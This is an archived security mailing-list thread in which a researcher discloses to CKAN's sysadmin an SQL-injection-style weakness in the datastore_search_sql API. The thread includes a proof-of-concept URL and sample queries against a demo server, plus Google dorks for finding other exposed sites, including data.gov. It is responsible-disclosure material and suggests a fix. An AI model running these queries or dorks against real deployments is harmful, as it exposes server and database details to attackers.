[CKAN-Security] Fwd: security vulnerability in CKAN

Matt Moore matt.moore at okfn.org
Mon Mar 2 08:18:43 UTC 2015 

---------- Forwarded message ----------
From: dophine britanico <dophine at gmail.com>
Date: 2 March 2015 at 07:48
Subject: Re: security vulnerability in CKAN
To: Matt Moore <matt.moore at okfn.org>


Hi,

Thank you  I believe in responsible security disclosure so I contacted you
here is what i found while auditing our CKAN server.

vulnerability: CKAN API

URL: http://demo.ckan.org/api/action/datastore_search_sql
SQL injection points: ?sql=INJECT HERE

To replicate:
Install JSON View plugin for firefox or chrome

POC:
http://demo.ckan.org/api/action/datastore_search_sql?sql=SELECT%20inet_server_addr%28%29
;

Sample: SQL
SELECT current_database()
SELECT current_user;
SELECT inet_server_addr();
SELECT version()

Vulnerable URL will returned sensitive information, Persistent attacker
will use and escalate this to a total server compromise.

Google dork:
inurl:datastore_search_sql

This can be also directly fingerprinted and replicated to any website using
CKAN.

Vulnerable as well is US data portal www.data.gov, in which I have also
contacted them  in case respond from yours is delayed

site:.gov datastore_search_sql

Suggested Fix:
Sanitize or remove 'sql' input paramater from datastore_search_sql
Remove api_info.html?resource_id sample query sample  from default install


Sincerely,
Michael Britanico








On Mon, Mar 2, 2015 at 3:27 PM, Matt Moore <matt.moore at okfn.org> wrote:

> Dophine,
>
> If you could provide us with some information, then we can look into the
> vulnerability.  I've mentioned this to our development team, but without
> some information, there's not much we can do.
>
> Thanks,
>
> Matthew Moore
>
> On 2 March 2015 at 06:13, dophine britanico <dophine at gmail.com> wrote:
>
>> Hello,
>>
>> I would like to inform you of a remote and serious vulnerability in the
>> default and recent version of CKAN and probably all recent versions of CKAN.
>>
>> Please contact me anytime.
>>
>> Dophine "Michael" Britanico
>> Security Researcher
>> (+63) 9151100672
>>
>>
>
>
> --
> Matthew Moore
> Sysadmin
> Open Knowledge - www.okfn.org
> Skype - notmatt
>




-- 
Matthew Moore
Sysadmin
Open Knowledge - www.okfn.org
Skype - notmatt
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20150302/eed463d9/attachment.html>

More information about the Security mailing list